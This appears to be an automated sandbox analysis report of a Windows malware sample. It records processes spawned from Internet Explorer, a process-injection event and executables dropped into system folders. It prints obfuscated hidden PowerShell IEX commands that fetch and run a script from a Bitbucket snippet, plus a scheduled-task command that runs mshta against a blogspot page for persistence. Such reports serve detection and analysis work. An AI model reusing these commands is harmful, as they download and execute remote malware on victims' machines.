parent_process	iexplore.exe	martian_process	pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend());
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 79 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/blessed-1.html""
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://bitbucket.org/!api/2.0/snippets/hogya/XB9Brq/9f1af38dd2ea1273db342e200377d878692c1ea2/files/blessed-1').GetResponse().GetResponseStream()).ReadToend());

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2836 resumed a thread in remote process 2936
NtResumeThread Jan. 19, 2022, 11:30 a.m.	thread_handle: 0x0000000000000344 suspend_count: 1 process_identifier: 2936	1	0	0

The process powershell.exe wrote an executable file to disk (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

blessed-1gg.html

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All